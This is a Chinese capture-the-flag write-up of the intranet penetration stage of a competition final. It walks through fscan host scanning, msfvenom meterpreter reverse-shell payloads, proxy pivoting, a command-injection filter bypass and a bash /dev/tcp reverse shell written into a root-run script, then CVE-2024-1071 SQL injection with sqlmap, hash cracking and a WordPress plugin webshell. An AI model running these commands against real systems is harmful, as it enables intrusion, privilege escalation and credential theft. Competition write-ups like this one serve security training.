长城杯决赛内网渗透部分
简单网络拓扑
准备工作
信息收集
由于是内网渗透,前面拿靶机权限的过程略过。我们现在已经拿到了靶机的root权限,但是内网还有几个web服务没打。
查看日志文件
发现172.25.0.0的网段。传fscan扫一下有哪些ip
root@photosite:/tmp# ./fscan -h 172.25.0.1/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.25.0.7 is alive
(icmp) Target 172.25.0.2 is alive
(icmp) Target 172.25.0.254 is alive
(icmp) Target 172.25.0.100 is alive
(icmp) Target 172.25.0.253 is alive
[*] Icmp alive hosts len is: 5
172.25.0.100:8080 open
172.25.0.100:445 open
172.25.0.100:139 open
172.25.0.100:80 open
172.25.0.7:80 open
172.25.0.2:80 open
172.25.0.100:22 open
172.25.0.2:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.25.0.2 code:200 len:747 title:None
[*] WebTitle http://172.25.0.100 code:200 len:750 title:Index of /
[*] WebTitle http://172.25.0.100:8080 code:200 len:256 title:None
[*] NetBios 172.25.0.100 STORAGE\STORAGE Windows 6.1
[*] OsInfo 172.25.0.100 (Windows 6.1)
[*] WebTitle http://172.25.0.7 code:200 len:93114 title:一个好网站
MSF配合proxychains配置代理
uname -a
Linux photosite 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux生成马
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.203.87 LPORT=2333 -f elf > shell.elf
弹shell
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.203.87
set lport 2333
exploit
靶机执行shell.elf。
成功弹shell
设置机器代理
run autoroute -s 172.25.0.0/24
配置socks代理
background
use auxiliary/server/socks_proxy
#选项使用默认的host:0.0.0.0 port:1080
exploit
jobs
修改配置文件:
vim /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1 1080
这样就上线成功,访问到202.0.2.32的内网172.25.0.2的机器。
videosite
IP:172.25.0.2
配置bp代理。
抓包看看情况
看一下后是
yt_utl=https://www.youtube.com/watch?v=1分析响应包,估计是curl 下载www.youtube.com的视频
我们||同时执行两条命令。成功执行。成功
拿webshell的flag,这里过滤了空格,我们随便绕一下。
flag10{573dca8802b944a54838269f04b80958}我们生成一个php反弹shell的马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.203.87 lport=2345 -f raw > exp.php
起一个web服务
python3 -m http.server 8888
172.25.0.2下载php马
wget%09http://192.168.203.87:8888/exp.php
msf监听
proxychains msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.203.87
set lport 2345
exploit
访问木马触发。这是172.25.0.2的机器信息。
meterpreter > sysinfo
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Computer : videosite
OS : Linux videosite 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64
Meterpreter : php/linux
发现clean.sh是www-data用户可写的。并且它是root执行的。我们修改一下这个文件。
echo -n 'bash -i >& /dev/tcp/192.168.203.87/9999 0>&1' >clean.sh
flag11{2455ed88a0fc5051923ecb918d825474}这台机子就打完了。
Wordpress
IP:172.25.0.7
可以看到这是个wordpress框架的服务。
proxychains firefox
那还想什么,赶紧用wpscan开扫
使用CVE-2024-1071的exp拿到sql语句
proxychains python3 exploiot.py http://172.25.0.7
proxychains sqlmap -u http://172.25.0.7/wp-admin/admin-ajax.php --method POST --data "action=um_get_members&nonce=a5ffeb8552&directory_id=b9238&sorting=user_login" --dbms mysql --technique=T -p sorting
用sqlmap拿到密码的哈希
$P$Bf4lC73BWrTvg6Zhp3ISWpqetY1NWm0hashcat爆破
hashcat -m 400 hash.txt rockyou.txt
账号密码
admin
jimmyissohot
wp后台文章中拿到flag18
flag18{ba248c985ace94863880921d8900c53f}
但是这个插件的php不能访问,会报403。我们把后台另一个插件关闭,这样之后去修改另一个插件的php代码,用蚁剑连接。
http://172.25.0.7/wp-content/plugins/hello.php蚁剑连接。
web目录找到flag19
flag19{a8cb6b851521c5de909cff763202d030}下一个flag是数据库中的。
拿到数据库信息。
WORDPRESS_DB_USER=wordpress
WORDPRESS_DB_NAME=wordpress
WORDPRESS_DB_PASSWORD=wordpress蚁剑的终端是虚拟终端,进行不了数据库操作。所以我们弹个shell到202.0.2.32上。
mysql -h172.18.0.2 -uwordpress -pwordpress -e "use wordpress;show tables;"估计得root才能拿到flag了。
上传了一个adminer.php具体翻翻每个表。仍然没有。那肯定就是得root才能看到了
我这里就不展示了,其实是提权没成功
转载
分享
发布投稿
